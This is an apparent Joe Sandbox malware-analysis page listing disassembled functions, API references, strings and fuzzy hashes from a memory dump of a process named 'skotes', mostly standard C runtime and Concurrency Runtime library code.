Source File: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000006.00000002.3296564843.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3297457709.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299138671.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299367462.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3300307618.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3301774924.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302083816.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304173393.00000000004A4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304808458.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305449229.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305809725.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306517544.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306849998.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3307187321.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3308051969.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3309195394.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3310844862.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312051088.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312449400.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312808925.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313023487.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313292834.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313557778.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313712501.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313903846.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314063316.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314922438.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3315383384.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316156788.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316341586.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316515374.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: FindInstanceTargetType$Offset
String ID: Bad dynamic_cast!
API String ID: 1467055271-2956939130
Opcode ID: ce843aeb167c6631968b6093aa6b32d2845c405f30157017ee1ed84ee4f0434f
Instruction ID: bfd1c3ce183bbcfbf277ee497f5a149e08a58659e0e2a55eb2d8898de37a0996
Opcode Fuzzy Hash: ce843aeb167c6631968b6093aa6b32d2845c405f30157017ee1ed84ee4f0434f
Instruction Fuzzy Hash: B021C972A20205AFCF14EE64DD86EEA77A8FB44794B10811AF91197682DB31ED209A91

Function 002B727C Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON

Download Yara Rule

APIs

_wcsrchr.LIBVCRUNTIME ref: 002B72BE

Strings

.bat, xrefs: 002B72ED
.exe, xrefs: 002B72CB
.com, xrefs: 002B72FE
.cmd, xrefs: 002B72DC

Memory Dump Source

Source File: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000006.00000002.3296564843.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3297457709.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299138671.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299367462.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3300307618.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3301774924.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302083816.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304173393.00000000004A4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304808458.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305449229.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305809725.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306517544.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306849998.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3307187321.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3308051969.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3309195394.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3310844862.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312051088.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312449400.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312808925.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313023487.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313292834.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313557778.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313712501.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313903846.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314063316.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314922438.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3315383384.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316156788.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316341586.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316515374.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: _wcsrchr
String ID: .bat$.cmd$.com$.exe
API String ID: 1752292252-4019086052
Opcode ID: eb7bc891e9979e0ba35b213879960a2b4da9c646b1f4b2554628e476c0e98283
Instruction ID: d9d5650cd1e05dac2ec06636bdfe6b64cf234cbd0dcd8830233c55b1f589d065
Opcode Fuzzy Hash: eb7bc891e9979e0ba35b213879960a2b4da9c646b1f4b2554628e476c0e98283
Instruction Fuzzy Hash: 62014E37B3861339661554189D02BF617D88BD2BF4715002BFC54F76C1DF85EDA221E0

Function 0029FA71 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 66COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0029FB06

Strings

kernel32.dll, xrefs: 0029FA7A
GetCurrentProcessorNumberEx, xrefs: 0029FABE
GetThreadGroupAffinity, xrefs: 0029FA93
SetThreadGroupAffinity, xrefs: 0029FA87

Memory Dump Source

Source File: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000006.00000002.3296564843.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3297457709.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299138671.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299367462.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3300307618.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3301774924.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302083816.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304173393.00000000004A4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304808458.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305449229.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305809725.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306517544.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306849998.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3307187321.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3308051969.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3309195394.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3310844862.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312051088.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312449400.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312808925.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313023487.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313292834.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313557778.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313712501.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313903846.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314063316.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314922438.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3315383384.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316156788.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316341586.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316515374.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error
String ID: GetCurrentProcessorNumberEx$GetThreadGroupAffinity$SetThreadGroupAffinity$kernel32.dll
API String ID: 348560076-465693683
Opcode ID: f66257eeaeb5fea1e54a346aca577dfb16b5c3b0c9526979be8307581b190733
Instruction ID: b8dd28874853429057ab74f21a2549f2b4a0f4c7200287f675d9101e15e4c262
Opcode Fuzzy Hash: f66257eeaeb5fea1e54a346aca577dfb16b5c3b0c9526979be8307581b190733
Instruction Fuzzy Hash: D501F9226793163A77907BB46ED6EAB25DC9E0670C721043BB441E7252EE64DC3046A4

Function 002B2097 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

StructuredWorkStealingQueue.LIBCMT ref: 002B20B7

Part of subcall function 002ACAF3: Mailbox.LIBCMT ref: 002ACB2D

Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 002B20C8
StructuredWorkStealingQueue.LIBCMT ref: 002B20FE
Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 002B210F

Strings

e, xrefs: 002B20D9

Memory Dump Source

Source File: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000006.00000002.3296564843.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3297457709.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299138671.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299367462.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3300307618.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3301774924.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302083816.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304173393.00000000004A4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304808458.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305449229.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305809725.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306517544.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306849998.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3307187321.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3308051969.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3309195394.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3310844862.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312051088.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312449400.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312808925.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313023487.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313292834.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313557778.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313712501.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313903846.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314063316.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314922438.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3315383384.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316156788.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316341586.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316515374.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: Work$Concurrency::details::ItemItem::QueueStealingStructured$Mailbox
String ID: e
API String ID: 1411586358-4024072794
Opcode ID: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
Instruction ID: 8009de69de9ee630ee9ca02b25baf5c4b704c49390a23fc9174aecdc22d8d4e3
Opcode Fuzzy Hash: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
Instruction Fuzzy Hash: 3A119431530205DBDB15DE6DC8816EB73A4EF123A4B24855AFC0A9F103DBB1D929CFA0

Function 0029D029 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 59COMMON

Download Yara Rule

APIs

___scrt_fastfail.LIBCMT ref: 0029D0A5

Strings

api-ms-win-core-synch-l1-2-0.dll, xrefs: 0029D03B
kernel32.dll, xrefs: 0029D04C
SleepConditionVariableCS, xrefs: 0029D05D
WakeAllConditionVariable, xrefs: 0029D069

Memory Dump Source

Source File: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000006.00000002.3296564843.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3297457709.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299138671.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299367462.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3300307618.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3301774924.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302083816.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304173393.00000000004A4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304808458.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305449229.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305809725.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306517544.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306849998.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3307187321.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3308051969.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3309195394.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3310844862.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312051088.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312449400.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312808925.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313023487.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313292834.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313557778.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313712501.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313903846.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314063316.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314922438.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3315383384.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316156788.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316341586.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316515374.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: ___scrt_fastfail
String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 2964418898-3242537097
Opcode ID: 92611243e6b44e1d6cc91c52c379c08dfaed2c641f13df4b5501d30e74de867a
Instruction ID: 62394170592707180b3c5ba303722de4fd4272d25ebd0b0084d712075ca382fa
Opcode Fuzzy Hash: 92611243e6b44e1d6cc91c52c379c08dfaed2c641f13df4b5501d30e74de867a
Instruction Fuzzy Hash: D201A221AFA72269FA302BB16E45E5B51C89F43B8CF051515BE00F7680EAA1DD3195A1

Function 002AE8DD Relevance: 7.6, APIs: 5, Instructions: 117COMMON

Download Yara Rule

APIs

Concurrency::location::_Assign.LIBCMT ref: 002AE91E
Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 002AE926
Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 002AE950
Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 002AE959
Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 002AE9DC

Memory Dump Source

Source File: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000006.00000002.3296564843.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3297457709.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299138671.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299367462.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3300307618.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3301774924.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302083816.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304173393.00000000004A4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304808458.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305449229.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305809725.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306517544.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306849998.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3307187321.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3308051969.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3309195394.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3310844862.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312051088.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312449400.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312808925.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313023487.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313292834.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313557778.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313712501.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313903846.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314063316.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314922438.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3315383384.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316156788.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316341586.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316515374.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Context$Base::$GroupScheduleSegment$AssignAvailableConcurrency::location::_EventInternalMakeProcessor::ReleaseRunnableTraceVirtual
String ID:
API String ID: 512098550-0
Opcode ID: 4702e5a371fdce8aa3ddc1cc02cf77d34b54e98d4f00e1302c70f9e6d9fc0776
Instruction ID: 09d7c91a649cafd95e8567561308e736fd8cb1c88bef93da7986c89c565a136b
Opcode Fuzzy Hash: 4702e5a371fdce8aa3ddc1cc02cf77d34b54e98d4f00e1302c70f9e6d9fc0776
Instruction Fuzzy Hash: E3416E75A1021AAFCF09DF68C998A6DB7B1FF49310F018159E906A7390CF74AE11CF81

Function 002AD2B9 Relevance: 7.6, APIs: 5, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::ReferenceCountedQuickBitSet::InterlockedSet.LIBCONCRT ref: 002AD344
ListArray.LIBCONCRT ref: 002AD367
Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 002AD370
ListArray.LIBCONCRT ref: 002AD3A8
Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 002AD3B3

Memory Dump Source

Source File: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000006.00000002.3296564843.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3297457709.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299138671.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299367462.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3300307618.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3301774924.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302083816.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
